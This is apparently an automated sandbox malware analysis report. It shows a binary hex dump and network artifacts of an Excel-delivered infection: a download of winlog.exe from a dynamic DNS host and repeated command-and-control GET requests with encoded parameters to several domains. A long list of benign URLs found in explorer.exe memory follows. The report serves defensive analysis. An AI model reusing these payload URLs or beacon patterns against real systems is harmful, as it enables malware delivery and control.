a0 0b 00 00 08 00 00 00 76 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 7e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 93 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 4c da 02 00 e4 70 02 00 03 00 00 00 05 00 00 06 30 4b 05 00 c8 47 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 25 00 00 0a 28 26 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 27 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 28 00 00 0a 00 02 16 28 29 00 00 0a 00 02 17 28 2a 00 00 0a 00 02 17 28 2b 00 00 0a 00 02 16 28 2c 00 00 0a 00 2a 4e 00 02 28 0d 00 00 06 6f 3f 08 00 06 28 2d 00 00 0a 00 2a 26 00 02 28 2e 00 00 0a 00 2a ce 73 2f 00 00 0a 80 01 00 00 04 73 30 00 00 0a 80 02 00 00 04 73 31 00 00 0a 80 03 00 00 04 73 32 00 00 0a 80 04 00 00 04 73 33 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 34 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 35 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 36 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 37 00 00 0a 0
          Source: global trafficHTTP traffic detected: GET /oean/?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=VZAj6Greo+wzdRR3y+9BSoe0Fg1VHX3dphRjh8ChsM9cVC7/tTrq8181uuZfup+KvkP/wA== HTTP/1.1Host: www.growingequity.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /oean/?jvylC6k0=f3eeGK1+0gCIvCWlFxxcFkAkVp6uwJz7C95spmYKsMNPFPV4KfhW/w3yTMrsoyUuOs+/YQ==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1Host: www.opmania36.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /oean/?jvylC6k0=Opa2yxOMW+p6bOslAOO6h/1EkNB54ngFJAZHYsyvYxpw4UyGhwhjUO3aSMs8Sdr4Amozmg==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1Host: www.kerifletcherrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /oean/?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=uJMS4n8m6ACsgyOWGpEiAtJtgQ+Goi3J4PdJxqA1a4iBE1ZCLNY3VJZ0KQbftK8zLMWD1g== HTTP/1.1Host: www.rentapalla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /oean/?jvylC6k0=0eja1hG/9tz86IL7VglQafiQyvHA2C4h7eUbaFgtY0eGgr750jLj1uDPdaibWffUDCzVWQ==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1Host: www.doxinlabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /kung2doc/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kungsb2sndygotchtsnp.dns.armyConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82E9F9C0.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /kung2doc/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kungsb2sndygotchtsnp.dns.armyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /oean/?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=VZAj6Greo+wzdRR3y+9BSoe0Fg1VHX3dphRjh8ChsM9cVC7/tTrq8181uuZfup+KvkP/wA== HTTP/1.1Host: www.growingequity.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /oean/?jvylC6k0=f3eeGK1+0gCIvCWlFxxcFkAkVp6uwJz7C95spmYKsMNPFPV4KfhW/w3yTMrsoyUuOs+/YQ==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1Host: www.opmania36.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /oean/?jvylC6k0=Opa2yxOMW+p6bOslAOO6h/1EkNB54ngFJAZHYsyvYxpw4UyGhwhjUO3aSMs8Sdr4Amozmg==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1Host: www.kerifletcherrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /oean/?gnj80=CJBh7xO8zrtpcTq&jvylC6k0=uJMS4n8m6ACsgyOWGpEiAtJtgQ+Goi3J4PdJxqA1a4iBE1ZCLNY3VJZ0KQbftK8zLMWD1g== HTTP/1.1Host: www.rentapalla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /oean/?jvylC6k0=0eja1hG/9tz86IL7VglQafiQyvHA2C4h7eUbaFgtY0eGgr750jLj1uDPdaibWffUDCzVWQ==&gnj80=CJBh7xO8zrtpcTq HTTP/1.1Host: www.doxinlabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: kungsb2sndygotchtsnp.dns.army
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 06:21:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000006.00000000.2191376130.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191376130.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2182575060.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2181605324.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2181605324.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000002.2380071243.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2191478810.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
